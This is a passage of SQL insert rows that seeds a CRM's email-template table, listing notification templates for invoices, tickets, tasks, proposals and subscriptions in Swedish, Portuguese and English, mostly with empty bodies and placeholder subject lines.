(79, 'estimate_request', 'estimate-request-received-to-user', 'english', 'Estimate Request Received (Sent to User)', 'Estimate Request Received', 'Hello,<br /><br /><strong>Your request has been received.</strong><br /><br />This email is to let you know that we received your request and we will get back to you as soon as possible with more information.<br /><br />Best Regards,<br />{email_signature}', '{companyname} | CRM', '', 0, 0, 0),
(80, 'client', 'new-client-created', 'swedish', 'New Contact Added/Registered (Welcome Email) [swedish]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(81, 'invoice', 'invoice-send-to-client', 'swedish', 'Send Invoice to Customer [swedish]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(82, 'ticket', 'new-ticket-opened-admin', 'swedish', 'New Ticket Opened (Opened by Staff, Sent to Customer) [swedish]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(83, 'ticket', 'ticket-reply', 'swedish', 'Ticket Reply (Sent to Customer) [swedish]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(84, 'ticket', 'ticket-autoresponse', 'swedish', 'New Ticket Opened - Autoresponse [swedish]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(85, 'invoice', 'invoice-payment-recorded', 'swedish', 'Invoice Payment Recorded (Sent to Customer) [swedish]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(86, 'invoice', 'invoice-overdue-notice', 'swedish', 'Invoice Overdue Notice [swedish]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(87, 'invoice', 'invoice-already-send', 'swedish', 'Invoice Already Sent to Customer [swedish]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(88, 'ticket', 'new-ticket-created-staff', 'swedish', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [swedish]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(89, 'estimate', 'estimate-send-to-client', 'swedish', 'Send Estimate to Customer [swedish]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(90, 'ticket', 'ticket-reply-to-admin', 'swedish', 'Ticket Reply (Sent to Staff) [swedish]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(91, 'estimate', 'estimate-already-send', 'swedish', 'Estimate Already Sent to Customer [swedish]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(92, 'contract', 'contract-expiration', 'swedish', 'Contract Expiration Reminder (Sent to Customer Contacts) [swedish]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(93, 'tasks', 'task-assigned', 'swedish', 'New Task Assigned (Sent to Staff) [swedish]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(94, 'tasks', 'task-added-as-follower', 'swedish', 'Staff Member Added as Follower on Task (Sent to Staff) [swedish]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(95, 'tasks', 'task-commented', 'swedish', 'New Comment on Task (Sent to Staff) [swedish]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(96, 'tasks', 'task-added-attachment', 'swedish', 'New Attachment(s) on Task (Sent to Staff) [swedish]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(97, 'estimate', 'estimate-declined-to-staff', 'swedish', 'Estimate Declined (Sent to Staff) [swedish]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(98, 'estimate', 'estimate-accepted-to-staff', 'swedish', 'Estimate Accepted (Sent to Staff) [swedish]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(99, 'proposals', 'proposal-client-accepted', 'swedish', 'Customer Action - Accepted (Sent to Staff) [swedish]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(100, 'proposals', 'proposal-send-to-customer', 'swedish', 'Send Proposal to Customer [swedish]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(101, 'proposals', 'proposal-client-declined', 'swedish', 'Customer Action - Declined (Sent to Staff) [swedish]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(102, 'proposals', 'proposal-client-thank-you', 'swedish', 'Thank You Email (Sent to Customer After Accept) [swedish]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(103, 'proposals', 'proposal-comment-to-client', 'swedish', 'New Comment  (Sent to Customer/Lead) [swedish]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(104, 'proposals', 'proposal-comment-to-admin', 'swedish', 'New Comment (Sent to Staff)  [swedish]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(105, 'estimate', 'estimate-thank-you-to-customer', 'swedish', 'Thank You Email (Sent to Customer After Accept) [swedish]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(106, 'tasks', 'task-deadline-notification', 'swedish', 'Task Deadline Reminder - Sent to Assigned Members [swedish]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(107, 'contract', 'send-contract', 'swedish', 'Send Contract to Customer [swedish]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(108, 'invoice', 'invoice-payment-recorded-to-staff', 'swedish', 'Invoice Payment Recorded (Sent to Staff) [swedish]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(109, 'ticket', 'auto-close-ticket', 'swedish', 'Auto Close Ticket [swedish]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(110, 'project', 'new-project-discussion-created-to-staff', 'swedish', 'New Project Discussion (Sent to Project Members) [swedish]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(111, 'project', 'new-project-discussion-created-to-customer', 'swedish', 'New Project Discussion (Sent to Customer Contacts) [swedish]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(112, 'project', 'new-project-file-uploaded-to-customer', 'swedish', 'New Project File(s) Uploaded (Sent to Customer Contacts) [swedish]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(113, 'project', 'new-project-file-uploaded-to-staff', 'swedish', 'New Project File(s) Uploaded (Sent to Project Members) [swedish]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(114, 'project', 'new-project-discussion-comment-to-customer', 'swedish', 'New Discussion Comment  (Sent to Customer Contacts) [swedish]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(115, 'project', 'new-project-discussion-comment-to-staff', 'swedish', 'New Discussion Comment (Sent to Project Members) [swedish]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(116, 'project', 'staff-added-as-project-member', 'swedish', 'Staff Added as Project Member [swedish]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(117, 'estimate', 'estimate-expiry-reminder', 'swedish', 'Estimate Expiration Reminder [swedish]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(118, 'proposals', 'proposal-expiry-reminder', 'swedish', 'Proposal Expiration Reminder [swedish]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(119, 'staff', 'new-staff-created', 'swedish', 'New Staff Created (Welcome Email) [swedish]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(120, 'client', 'contact-forgot-password', 'swedish', 'Forgot Password [swedish]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(121, 'client', 'contact-password-reseted', 'swedish', 'Password Reset - Confirmation [swedish]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(122, 'client', 'contact-set-password', 'swedish', 'Set New Password [swedish]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(123, 'staff', 'staff-forgot-password', 'swedish', 'Forgot Password [swedish]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(124, 'staff', 'staff-password-reseted', 'swedish', 'Password Reset - Confirmation [swedish]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(125, 'project', 'assigned-to-project', 'swedish', 'New Project Created (Sent to Customer Contacts) [swedish]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(126, 'tasks', 'task-added-attachment-to-contacts', 'swedish', 'New Attachment(s) on Task (Sent to Customer Contacts) [swedish]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(127, 'tasks', 'task-commented-to-contacts', 'swedish', 'New Comment on Task (Sent to Customer Contacts) [swedish]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(128, 'leads', 'new-lead-assigned', 'swedish', 'New Lead Assigned to Staff Member [swedish]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(129, 'client', 'client-statement', 'swedish', 'Statement - Account Summary [swedish]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(130, 'ticket', 'ticket-assigned-to-admin', 'swedish', 'New Ticket Assigned (Sent to Staff) [swedish]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(131, 'client', 'new-client-registered-to-admin', 'swedish', 'New Customer Registration (Sent to admins) [swedish]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(132, 'leads', 'new-web-to-lead-form-submitted', 'swedish', 'Web to lead form submitted - Sent to lead [swedish]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(133, 'staff', 'two-factor-authentication', 'swedish', 'Two Factor Authentication [swedish]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(134, 'project', 'project-finished-to-customer', 'swedish', 'Project Marked as Finished (Sent to Customer Contacts) [swedish]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(135, 'credit_note', 'credit-note-send-to-client', 'swedish', 'Send Credit Note To Email [swedish]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(136, 'tasks', 'task-status-change-to-staff', 'swedish', 'Task Status Changed (Sent to Staff) [swedish]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(137, 'tasks', 'task-status-change-to-contacts', 'swedish', 'Task Status Changed (Sent to Customer Contacts) [swedish]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(138, 'staff', 'reminder-email-staff', 'swedish', 'Staff Reminder Email [swedish]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(139, 'contract', 'contract-comment-to-client', 'swedish', 'New Comment  (Sent to Customer Contacts) [swedish]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(140, 'contract', 'contract-comment-to-admin', 'swedish', 'New Comment (Sent to Staff)  [swedish]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(141, 'subscriptions', 'send-subscription', 'swedish', 'Send Subscription to Customer [swedish]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(142, 'subscriptions', 'subscription-payment-failed', 'swedish', 'Subscription Payment Failed [swedish]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(143, 'subscriptions', 'subscription-canceled', 'swedish', 'Subscription Canceled (Sent to customer primary contact) [swedish]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(144, 'subscriptions', 'subscription-payment-succeeded', 'swedish', 'Subscription Payment Succeeded (Sent to customer primary contact) [swedish]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(145, 'contract', 'contract-expiration-to-staff', 'swedish', 'Contract Expiration Reminder (Sent to Staff) [swedish]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(146, 'gdpr', 'gdpr-removal-request', 'swedish', 'Removal Request From Contact (Sent to administrators) [swedish]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(147, 'gdpr', 'gdpr-removal-request-lead', 'swedish', 'Removal Request From Lead (Sent to administrators) [swedish]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(148, 'client', 'client-registration-confirmed', 'swedish', 'Customer Registration Confirmed [swedish]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(149, 'contract', 'contract-signed-to-staff', 'swedish', 'Contract Signed (Sent to Staff) [swedish]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(150, 'subscriptions', 'customer-subscribed-to-staff', 'swedish', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [swedish]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(151, 'client', 'contact-verification-email', 'swedish', 'Email Verification (Sent to Contact After Registration) [swedish]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(152, 'client', 'new-customer-profile-file-uploaded-to-staff', 'swedish', 'New Customer Profile File(s) Uploaded (Sent to Staff) [swedish]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(153, 'staff', 'event-notification-to-staff', 'swedish', 'Event Notification (Calendar) [swedish]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(154, 'subscriptions', 'subscription-payment-requires-action', 'swedish', 'Credit Card Authorization Required - SCA [swedish]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(155, 'invoice', 'invoice-due-notice', 'swedish', 'Invoice Due Notice [swedish]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(156, 'estimate_request', 'estimate-request-submitted-to-staff', 'swedish', 'Estimate Request Submitted (Sent to Staff) [swedish]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(157, 'estimate_request', 'estimate-request-assigned', 'swedish', 'Estimate Request Assigned (Sent to Staff) [swedish]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(158, 'estimate_request', 'estimate-request-received-to-user', 'swedish', 'Estimate Request Received (Sent to User) [swedish]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(159, 'client', 'new-client-created', 'portuguese', 'New Contact Added/Registered (Welcome Email) [portuguese]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(160, 'invoice', 'invoice-send-to-client', 'portuguese', 'Send Invoice to Customer [portuguese]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(161, 'ticket', 'new-ticket-opened-admin', 'portuguese', 'New Ticket Opened (Opened by Staff, Sent to Customer) [portuguese]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(162, 'ticket', 'ticket-reply', 'portuguese', 'Ticket Reply (Sent to Customer) [portuguese]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(163, 'ticket', 'ticket-autoresponse', 'portuguese', 'New Ticket Opened - Autoresponse [portuguese]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(164, 'invoice', 'invoice-payment-recorded', 'portuguese', 'Invoice Payment Recorded (Sent to Customer) [portuguese]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(165, 'invoice', 'invoice-overdue-notice', 'portuguese', 'Invoice Overdue Notice [portuguese]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(166, 'invoice', 'invoice-already-send', 'portuguese', 'Invoice Already Sent to Customer [portuguese]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(167, 'ticket', 'new-ticket-created-staff', 'portuguese', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [portuguese]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(168, 'estimate', 'estimate-send-to-client', 'portuguese', 'Send Estimate to Customer [portuguese]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(169, 'ticket', 'ticket-reply-to-admin', 'portuguese', 'Ticket Reply (Sent to Staff) [portuguese]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(170, 'estimate', 'estimate-already-send', 'portuguese', 'Estimate Already Sent to Customer [portuguese]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(171, 'contract', 'contract-expiration', 'portuguese', 'Contract Expiration Reminder (Sent to Customer Contacts) [portuguese]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(172, 'tasks', 'task-assigned', 'portuguese', 'New Task Assigned (Sent to Staff) [portuguese]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(173, 'tasks', 'task-added-as-follower', 'portuguese', 'Staff Member Added as Follower on Task (Sent to Staff) [portuguese]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(174, 'tasks', 'task-commented', 'portuguese', 'New Comment on Task (Sent to Staff) [portuguese]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(175, 'tasks', 'task-added-attachment', 'portuguese', 'New Attachment(s) on Task (Sent to Staff) [portuguese]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(176, 'estimate', 'estimate-declined-to-staff', 'portuguese', 'Estimate Declined (Sent to Staff) [portuguese]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(177, 'estimate', 'estimate-accepted-to-staff', 'portuguese', 'Estimate Accepted (Sent to Staff) [portuguese]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(178, 'proposals', 'proposal-client-accepted', 'portuguese', 'Customer Action - Accepted (Sent to Staff) [portuguese]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(179, 'proposals', 'proposal-send-to-customer', 'portuguese', 'Send Proposal to Customer [portuguese]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(180, 'proposals', 'proposal-client-declined', 'portuguese', 'Customer Action - Declined (Sent to Staff) [portuguese]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(181, 'proposals', 'proposal-client-thank-you', 'portuguese', 'Thank You Email (Sent to Customer After Accept) [portuguese]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(182, 'proposals', 'proposal-comment-to-client', 'portuguese', 'New Comment  (Sent to Customer/Lead) [portuguese]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(183, 'proposals', 'proposal-comment-to-admin', 'portuguese', 'New Comment (Sent to Staff)  [portuguese]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(184, 'estimate', 'estimate-thank-you-to-customer', 'portuguese', 'Thank You Email (Sent to Customer After Accept) [portuguese]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(185, 'tasks', 'task-deadline-notification', 'portuguese', 'Task Deadline Reminder - Sent to Assigned Members [portuguese]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(186, 'contract', 'send-contract', 'portuguese', 'Send Contract to Customer [portuguese]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(187, 'invoice', 'invoice-payment-recorded-to-staff', 'portuguese', 'Invoice Payment Recorded (Sent to Staff) [portuguese]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(188, 'ticket', 'auto-close-ticket', 'portuguese', 'Auto Close Ticket [portuguese]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(189, 'project', 'new-project-discussion-created-to-staff', 'portuguese', 'New Project Discussion (Sent to Project Members) [portuguese]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(190, 'project', 'new-project-discussion-created-to-customer', 'portuguese', 'New Project Discussion (Sent to Customer Contacts) [portuguese]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(191, 'project', 'new-project-file-uploaded-to-customer', 'portuguese', 'New Project File(s) Uploaded (Sent to Customer Contacts) [portuguese]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(192, 'project', 'new-project-file-uploaded-to-staff', 'portuguese', 'New Project File(s) Uploaded (Sent to Project Members) [portuguese]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(193, 'project', 'new-project-discussion-comment-to-customer', 'portuguese', 'New Discussion Comment  (Sent to Customer Contacts) [portuguese]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(194, 'project', 'new-project-discussion-comment-to-staff', 'portuguese', 'New Discussion Comment (Sent to Project Members) [portuguese]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(195, 'project', 'staff-added-as-project-member', 'portuguese', 'Staff Added as Project Member [portuguese]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(196, 'estimate', 'estimate-expiry-reminder', 'portuguese', 'Estimate Expiration Reminder [portuguese]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(197, 'proposals', 'proposal-expiry-reminder', 'portuguese', 'Proposal Expiration Reminder [portuguese]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(198, 'staff', 'new-staff-created', 'portuguese', 'New Staff Created (Welcome Email) [portuguese]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(199, 'client', 'contact-forgot-password', 'portuguese', 'Forgot Password [portuguese]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(200, 'client', 'contact-password-reseted', 'portuguese', 'Password Reset - Confirmation [portuguese]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(201, 'client', 'contact-set-password', 'portuguese', 'Set New Password [portuguese]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(202, 'staff', 'staff-forgot-password', 'portuguese', 'Forgot Password [portuguese]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(203, 'staff', 'staff-password-reseted', 'portuguese', 'Password Reset - Confirmation [portuguese]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(204, 'project', 'assigned-to-project', 'portuguese', 'New Project Created (Sent to Customer Contacts) [portuguese]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(205, 'tasks', 'task-added-attachment-to-contacts', 'portuguese', 'New Attachment(s) on Task (Sent to Customer Contacts) [portuguese]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(206, 'tasks', 'task-commented-to-contacts', 'portuguese', 'New Comment on Task (Sent to Customer Contacts) [portuguese]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(207, 'leads', 'new-lead-assigned', 'portuguese', 'New Lead Assigned to Staff Member [portuguese]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(208, 'client', 'client-statement', 'portuguese', 'Statement - Account Summary [portuguese]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(209, 'ticket', 'ticket-assigned-to-admin', 'portuguese', 'New Ticket Assigned (Sent to Staff) [portuguese]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(210, 'client', 'new-client-registered-to-admin', 'portuguese', 'New Customer Registration (Sent to admins) [portuguese]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(211, 'leads', 'new-web-to-lead-form-submitted', 'portuguese', 'Web to lead form submitted - Sent to lead [portuguese]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(212, 'staff', 'two-factor-authentication', 'portuguese', 'Two Factor Authentication [portuguese]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(213, 'project', 'project-finished-to-customer', 'portuguese', 'Project Marked as Finished (Sent to Customer Contacts) [portuguese]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(214, 'credit_note', 'credit-note-send-to-client', 'portuguese', 'Send Credit Note To Email [portuguese]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(215, 'tasks', 'task-status-change-to-staff', 'portuguese', 'Task Status Changed (Sent to Staff) [portuguese]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(216, 'tasks', 'task-status-change-to-contacts', 'portuguese', 'Task Status Changed (Sent to Customer Contacts) [portuguese]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(217, 'staff', 'reminder-email-staff', 'portuguese', 'Staff Reminder Email [portuguese]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(218, 'contract', 'contract-comment-to-client', 'portuguese', 'New Comment  (Sent to Customer Contacts) [portuguese]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(219, 'contract', 'contract-comment-to-admin', 'portuguese', 'New Comment (Sent to Staff)  [portuguese]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(220, 'subscriptions', 'send-subscription', 'portuguese', 'Send Subscription to Customer [portuguese]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(221, 'subscriptions', 'subscription-payment-failed', 'portuguese', 'Subscription Payment Failed [portuguese]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(222, 'subscriptions', 'subscription-canceled', 'portuguese', 'Subscription Canceled (Sent to customer primary contact) [portuguese]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(223, 'subscriptions', 'subscription-payment-succeeded', 'portuguese', 'Subscription Payment Succeeded (Sent to customer primary contact) [portuguese]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(224, 'contract', 'contract-expiration-to-staff', 'portuguese', 'Contract Expiration Reminder (Sent to Staff) [portuguese]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(225, 'gdpr', 'gdpr-removal-request', 'portuguese', 'Removal Request From Contact (Sent to administrators) [portuguese]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(226, 'gdpr', 'gdpr-removal-request-lead', 'portuguese', 'Removal Request From Lead (Sent to administrators) [portuguese]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(227, 'client', 'client-registration-confirmed', 'portuguese', 'Customer Registration Confirmed [portuguese]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(228, 'contract', 'contract-signed-to-staff', 'portuguese', 'Contract Signed (Sent to Staff) [portuguese]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(229, 'subscriptions', 'customer-subscribed-to-staff', 'portuguese', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [portuguese]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(230, 'client', 'contact-verification-email', 'portuguese', 'Email Verification (Sent to Contact After Registration) [portuguese]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(231, 'client', 'new-customer-profile-file-uploaded-to-staff', 'portuguese', 'New Customer Profile File(s) Uploaded (Sent to Staff) [portuguese]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(232, 'staff', 'event-notification-to-staff', 'portuguese', 'Event Notification (Calendar) [portuguese]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(233, 'subscriptions', 'subscription-payment-requires-action', 'portuguese', 'Credit Card Authorization Required - SCA [portuguese]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(234, 'invoice', 'invoice-due-notice', 'portuguese', 'Invoice Due Notice [portuguese]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(235, 'estimate_request', 'estimate-request-submitted-to-staff', 'portuguese', 'Estimate Request Submitted (Sent to Staff) [portuguese]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(236, 'estimate_request', 'estimate-request-assigned', 'portuguese', 'Estimate Request Assigned (Sent to Staff) [portuguese]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(237, 'estimate_request', 'estimate-request-received-to-user', 'portuguese', 'Estimate Request Received (Sent to User) [portuguese]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(238, 'client', 'new-client-created', 'turkish', 'New Contact Added/Registered (Welcome Email) [turkish]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
